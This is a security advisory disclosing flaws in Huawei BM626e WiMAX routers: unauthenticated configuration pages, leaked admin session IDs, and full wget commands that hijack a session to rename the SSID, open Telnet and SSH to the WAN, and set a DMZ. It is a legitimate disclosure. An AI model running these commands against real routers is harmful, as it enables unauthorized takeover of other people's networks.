Huawei Technologies Co. Ltd. is a Chinese multinational networking and telecommunications equipment and services company. It is the largest telecommunications equipment manufacturer in the world.
The Huawei BM626e device is a Wimax router / access point overall badly designed with a lot of vulnerabilities. The device is provided by MTN Cote d'Ivoire as a "Wibox". It's available in a number of countries to provide Internet with a Wimax network.
The tests below are done using the last available firmware (firmware V100R001CIVC24B010).
Note: This firmware is being used by other Huawei Wimax CPEs and Huawei confirmed that the devices below are vulnerable to the same threats:
The routers are still on sale and used in several countries. They are used, at least, in these countries:
By default, the webpage http://192.168.1.1/check.html
contains important information
(wimax configuration, network configuration, wifi and sip configuration ...) and is reachable without authentication.
A JavaScript redirection will annoy the attacker (/login.html
) and can be easily defeated by using wget:
root@kali:~# wget http://192.168.1.1/check.html; less check.html
If an admin is currently managing the device (OR used the device but didn't properly disconnect), the current/used session can be stolen by an attacker located in the LAN (or WAN if the HTTP is open in the WAN interface).
The admin session id ("SID") can be recovered in multiple webpages without authentication:
The security.html webpage contains a valid session ID, without authentication, within the JavaScript sources:
sid="SID24188"
A "protection" is written in JavaScript and will redirect the attacker to the login webpage but the Javascript contains the session of the admin (sid="SIDXXXXX") so the attacker can retrieve it easily using wget:
root@kali:~# wget http://192.168.1.1/wimax/security.html ; less security.html
root@kali:~# wget http://192.168.1.1/static/deviceinfo.html ; less deviceinfo.html
Note that, by visiting the webpages, the attacker will also disconnect the administrator from the Control Panel (http://192.168.1.1/
)
By using the previously stolen SID, it is possible to perform administration tasks without having proper credentials:
Retrieve private information (network information):
root@kali:~# wget -qO- 'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0'
Saving to: `STDOUT'
stats={};do{stats.dhcplist="44:8A:5B:AA:AA:AA,192.168.1.3,71:52:02@00:E0:4C:AA:AA:AA,192.168.1.2,71:52:02";
stats.reth="
eth0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:27 errors:0 dropped:0 overruns:0 frame:0
TX packets:109 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2887 (2.8 KiB) TX bytes:46809 (45.7 KiB)
Interrupt:9 Base address:0x4000
eth1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:9 Base address:0x4000
eth2 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:2530 errors:0 dropped:0 overruns:0 frame:0
TX packets:2619 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:351557 (343.3 KiB) TX bytes:536669 (524.0 KiB)
Interrupt:9 Base address:0x4000
eth3 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:9 Base address:0x4000
";stats.wlaninfo="
wl0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5257 errors:0 dropped:0 overruns:0 frame:0
TX packets:846 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1117126 (1.0 MiB) TX bytes:279600 (273.0 KiB)
wl1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
[...]
root@kali:~#
Retrieve private information:
An other JSX webpage: http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0
root@kali:~# wget -qO- 'http://192.168.1.1/advanced/WANconnect.jsx?WWW_SID=SID24188&&t=0'
stats={};do{stats.PPPoEStatus='Disconnected'; stats.GREStatus='Disconnected';stats.wpsmode="7";stats.position="Idle,Idle,"}while(0);
It's possible to get a lot of information by abusing JSX webpages. Listing the JSX webpages is left as an exercise for the reader.
The Session ID can be used to change parameters in the Wimax router too:
Editing the WLAN configuration:
This request will change the first SSID name to 'powned' (you need to edit the WWW_SID, by the one provided in the /wimax/security.html
webpage):
root@kali:~# wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_1; SecondMenu=User_1_1; ThirdMenu=User_1_1_1" --post-data='WWW_SID=SID24188&REDIRECT=wlan.html&SERVICE=wifi&SLEEP=2&WLAN_WifiEnable=1&Wlan_chkbox=0&WLAN_WirelessMode=9&WLAN_Channel=0&WLAN_SSID1=powned&WLAN_HideSSID=0%3B0%3B&WLAN_AuthMode=WPAPSKWPA2PSK%3BWPAPSKWPA2PSK%3B&WLAN_EncrypType=TKIPAES%3BTKIPAES%3B&WLAN_COUNTRY_REGION=1&WLAN_Country_Code=1d&WLAN_TXPOWER_NOR=13&WLAN_MAXNUM_STA=16%3B16%3B&WLAN_FragThreshold=2346&WLAN_BeaconPeriod=100&WLAN_RTSThreshold=2347&WLAN_BssidNum=2&WLAN_WscConfMode=7&WLAN_WscAction=3&WLAN_CountryCode=CI&WLAN_WscPinCode=&WLAN_TXRATE=0&WLAN_HTBW=0&WLAN_NTH_SSID=1&WLAN_PinFlag=2' http://192.168.1.1/basic/mtk.cgi
Opening the management interface:
This request will open HTTP/HTTPS/TELNET/SSH in the LAN AND the WAN interfaces (you need to edit the WWW_SID, by the one provided in the /wimax/security.html
webpage):
root@kali:~# wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1; ThirdMenu=User_2_1_0" --post-data='WWW_SID=SID24188&REDIRECT=acl.html&SERVICE=mini_httpd%2Cmini_httpsd%2Ctelnetd%2Cdropbear&SLEEP=2&HTTPD_ENABLE=1&HTTPSD_ENABLE=1&MGMT_WEB_WAN=1&MGMT_TELNET_LAN=1&MGMT_TELNET_WAN=1&MGMT_SSH_LAN=1&MGMT_SSH_WAN=1&HTTPD_PORT=80&httpslan=getValue%28&HTTPSD_PORT=443&TELNETD_PORT=23&SSHD_PORT=22' http://192.168.1.1/basic/mtk.cgi
(The legit administrator can check the changes here: http://192.168.1.1/advanced/acl.html
)
Changing "DMZ action" - redirecting WAN ports to a target client located in the LAN (you need to edit the WWW_SID, by the one provided in the /wimax/security.html
webpage):
root@kali:~# wget --no-cookies --header "Cookie: LoginTimes=0:LoginOverTime=0; FirstMenu=User_2; SecondMenu=User_2_1; ThirdMenu=User_2_1_0" --post-data='WWW_SID=SID24188&REDIRECT=dmz.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_HOST=192.168.1.2&NETFILTER_DMZ_ENABLE=1&DMZInterface=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1&DMZHostIPAddress=192.168.1.2&DMZEnable=on&TriggerPort=&TriggerPortEnd=' http://192.168.1.1/advanced/user.cgi
(The legit administrator can check the changes here: http://192.168.1.1/advanced/dmz.html
)
Other actions are possible and are left as an exercise for the reader:
The vulnerable routers are in the End Of Service cycle and will not be supported anymore.
The vendor encourages its clients to discard existing unsupported models and to use new routers.
Official Huawei Security Notice
These vulnerabilities were found by Pierre Kim (@PierreKimSec).
https://pierrekim.github.io/advisories/2015-huawei-0x01.txt
https://pierrekim.github.io/blog/2015-12-01-Huawei-Wimax-routers-vulnerable-to-multiple-threats.html
This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
published on 2015-12-01 00:00:00 by Pierre Kim <pierre.kim.sec@gmail.com>